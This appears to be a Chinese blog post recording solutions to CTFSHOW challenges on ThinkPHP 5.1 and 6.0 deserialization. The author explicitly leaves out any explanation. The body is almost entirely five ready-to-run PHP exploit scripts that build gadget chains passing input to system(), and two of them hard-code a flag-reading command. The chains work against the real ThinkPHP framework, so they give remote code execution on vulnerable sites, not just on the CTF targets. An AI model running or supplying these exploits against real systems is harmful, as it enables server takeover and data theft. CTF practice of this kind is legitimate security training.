【Web】CTFSHOW-ThinkPHP5-6反序列化刷题记录(全)

  • 开发
  • 35

目录

web611 

web612

web613-622

web623

web624-626

纯记录exp,链子不作赘述

web611 

具体分析:

ThinkPHP-Vuln/ThinkPHP5/ThinkPHP5.1.X反序列化利用链.md at master · Mochazz/ThinkPHP-Vuln · GitHub

题目直接给了反序列化入口

exp:

<?php
namespace think;
abstract class Model{
    protected $append = [];
    private $data = [];
    function __construct(){
        $this->append = ["Sentiment"=>["hello"]];
        $this->data = ["Sentiment"=>new Request()];
    }
}
class Request
{
    protected $hook = [];
    protected $filter = "system";
    protected $config = [
        // 表单请求类型伪装变量
        'var_method'       => '_method',
        // 表单ajax伪装变量
        'var_ajax'         => '_ajax',
        // 表单pjax伪装变量
        'var_pjax'         => '_pjax',
        // PATHINFO变量名 用于兼容模式
        'var_pathinfo'     => 's',
        // 兼容PATH_INFO获取
        'pathinfo_fetch'   => ['ORIG_PATH_INFO', 'REDIRECT_PATH_INFO', 'REDIRECT_URL'],
        // 默认全局过滤方法 用逗号分隔多个
        'default_filter'   => '',
        // 域名根,如thinkphp.cn
        'url_domain_root'  => '',
        // HTTPS代理标识
        'https_agent_name' => '',
        // IP代理获取标识
        'http_agent_ip'    => 'HTTP_X_REAL_IP',
        // URL伪静态后缀
        'url_html_suffix'  => 'html',
    ];
    function __construct(){
        $this->filter = "system";
        $this->config = ["var_ajax"=>''];
        $this->hook = ["visible"=>[$this,"isAjax"]];
    }
}
namespace think\process\pipes;

use think\model\concern\Conversion;
use think\model\Pivot;
class Windows
{
    private $files = [];

    public function __construct()
    {
        $this->files=[new Pivot()];
    }
}
namespace think\model;

use think\Model;

class Pivot extends Model
{
}
use think\process\pipes\Windows;
echo urlencode(serialize(new Windows()));
?>

web612

exp:

<?php
namespace think;
abstract class Model{
    protected $append = [];
    private $data = [];
    function __construct(){
        $this->append = ["Sentiment"=>["hello"]];
        $this->data = ["Sentiment"=>new Request()];
    }
}
class Request
{
    protected $hook = [];
    protected $filter = "system";
    protected $config = [
        // 表单请求类型伪装变量
        'var_method'       => '_method',
        // 表单ajax伪装变量
        'var_ajax'         => '_ajax',
        // 表单pjax伪装变量
        'var_pjax'         => '',
        // PATHINFO变量名 用于兼容模式
        'var_pathinfo'     => 's',
        // 兼容PATH_INFO获取
        'pathinfo_fetch'   => ['ORIG_PATH_INFO', 'REDIRECT_PATH_INFO', 'REDIRECT_URL'],
        // 默认全局过滤方法 用逗号分隔多个
        'default_filter'   => '',
        // 域名根,如thinkphp.cn
        'url_domain_root'  => '',
        // HTTPS代理标识
        'https_agent_name' => '',
        // IP代理获取标识
        'http_agent_ip'    => 'HTTP_X_REAL_IP',
        // URL伪静态后缀
        'url_html_suffix'  => 'html',
    ];
    function __construct(){
        $this->filter = "system";
        $this->config = ["var_ajax"=>''];
        $this->hook = ["visible"=>[$this,"isPjax"]];
    }
}
namespace think\process\pipes;

use think\model\concern\Conversion;
use think\model\Pivot;
class Windows
{
    private $files = [];

    public function __construct()
    {
        $this->files=[new Pivot()];
    }
}
namespace think\model;

use think\Model;

class Pivot extends Model
{
}
use think\process\pipes\Windows;
echo urlencode(serialize(new Windows()));
?>

web613-622

exp

<?php
namespace think;
abstract class Model{
    protected $append = [];
    private $data = [];
    function __construct(){
        $this->append = ["Sentiment"=>["hello"]];
        $this->data = ["Sentiment"=>new Request()];
    }
}
class Request
{
    protected $hook = [];
    protected $filter = "system";
    protected $config = [
        // 表单请求类型伪装变量
        'var_method'       => '_method',
        // 表单ajax伪装变量
        'var_ajax'         => '_ajax',
        // 表单pjax伪装变量
        'var_pjax'         => '_pjax',
        // PATHINFO变量名 用于兼容模式
        'var_pathinfo'     => 's',
        // 兼容PATH_INFO获取
        'pathinfo_fetch'   => ['ORIG_PATH_INFO', 'REDIRECT_PATH_INFO', 'REDIRECT_URL'],
        // 默认全局过滤方法 用逗号分隔多个
        'default_filter'   => '',
        // 域名根,如thinkphp.cn
        'url_domain_root'  => '',
        // HTTPS代理标识
        'https_agent_name' => '',
        // IP代理获取标识
        'http_agent_ip'    => 'HTTP_X_REAL_IP',
        // URL伪静态后缀
        'url_html_suffix'  => 'html',
    ];
    function __construct(){
        $this->filter = "system";
        $this->config = ["var_ajax"=>''];
        $this->get = ['Z3r4y'=>'suibian'];
        $this->hook = ['visible'=>[$this,"__get"]];
    }
}
namespace think\process\pipes;

use think\model\concern\Conversion;
use think\model\Pivot;
class Windows
{
    private $files = [];

    public function __construct()
    {
        $this->files=[new Pivot()];
    }
}
namespace think\model;

use think\Model;

class Pivot extends Model
{
}
use think\process\pipes\Windows;
echo urlencode(serialize(new Windows()));
?>

web623

ThinkPHP6.0 反序列化漏洞_thinkphp6.0漏洞-CSDN博客

exp

<?php
namespace think\model\concern;
trait Attribute
{
    private $data = ["key"=>"tac /f*"];
    private $withAttr = ["key"=>"system"];
}
namespace think;
abstract class Model
{
    use model\concern\Attribute;
    private $lazySave = true;
    protected $withEvent = false;
    private $exists = true;
    private $force = true;
    protected $name;
    public function __construct($obj=""){
        $this->name=$obj;
    }
}
namespace think\model;
use think\Model;
class Pivot extends Model
{}
$a=new Pivot();
$b=new Pivot($a);
echo urlencode(serialize($b));

web624-626

exp

<?php

namespace think\model\concern;

trait Attribute
{
    private $data = ["key" => ["key1" => "tac /f*"]];
    private $withAttr = ["key"=>["key1"=>"system"]];
    protected $json = ["key"];
}
namespace think;

abstract class Model
{
    use model\concern\Attribute;
    private $lazySave;
    protected $withEvent;
    private $exists;
    private $force;
    protected $table;
    protected $jsonAssoc;
    function __construct($obj = '')
    {
        $this->lazySave = true;
        $this->withEvent = false;
        $this->exists = true;
        $this->force = true;
        $this->table = $obj;
        $this->jsonAssoc = true;
    }
}

namespace think\model;

use think\Model;

class Pivot extends Model
{
}
$a = new Pivot();
$b = new Pivot($a);

echo urlencode(serialize($b));

阅读全部

相关推荐

  6. 记录4.17-5.6

    2024-04-09 17:06:02       26 阅读

  7. 网络安全实战:剖析ThinkPHP 5.1.X序列漏洞

    2024-04-09 17:06:02       32 阅读

  8. ThinkPHP 5.1.X 序列漏洞:深入分析与利用技巧

    2024-04-09 17:06:02       22 阅读

最近更新

  3. docker php8.1+nginx base 镜像 dockerfile 配置

    2024-04-09 17:06:02       94 阅读

  4. Could not load dynamic library ‘cudart64_100.dll‘

    2024-04-09 17:06:02       101 阅读

  9. 在Django里面运行非项目文件

    2024-04-09 17:06:02       82 阅读

  19. Python语言-面向对象

    2024-04-09 17:06:02       91 阅读

  20. 如何分清楚常见的 Git 分支管理策略Git Flow、GitHub Flow 和 GitLab Flow

    2024-04-09 17:06:02       85 阅读

热门阅读

  3. 蓝桥杯刷题 深度优先搜索-[178]全球变暖(C++)

    2024-04-09 17:06:02       32 阅读

  4. 声明结构体变量时,是否一定要加struct关键字?

    2024-04-09 17:06:02       31 阅读

  10. 如何才能把握电商的私域流量呢?

    2024-04-09 17:06:02       42 阅读

  11. 大数据分层存储架构:ODS、DWD、DWM与DWS详解

    2024-04-09 17:06:02       34 阅读

  12. 算法刷题记录 Day39

    2024-04-09 17:06:02       35 阅读

  13. vue如何使用websocket去接收数据和发送数据

    2024-04-09 17:06:02       40 阅读

  14. 【算法刷题day20】Leetcode:654. 最大二叉树、617.合并二叉树、700. 二叉搜索树中的搜索、98.验证二叉搜索树

    2024-04-09 17:06:02       41 阅读

  17. Redis: 内存回收

    2024-04-09 17:06:02       36 阅读

  19. Oracle SQL中的DECODE函数与NVL函数:区别与应用场景详析

    2024-04-09 17:06:02       38 阅读

  21. 【C/C++】BST树的后序遍历

    2024-04-09 17:06:02       33 阅读

  23. 设计模式:责任链模式

    2024-04-09 17:06:02       34 阅读

  30. git分支-分支管理

    2024-04-09 17:06:02       33 阅读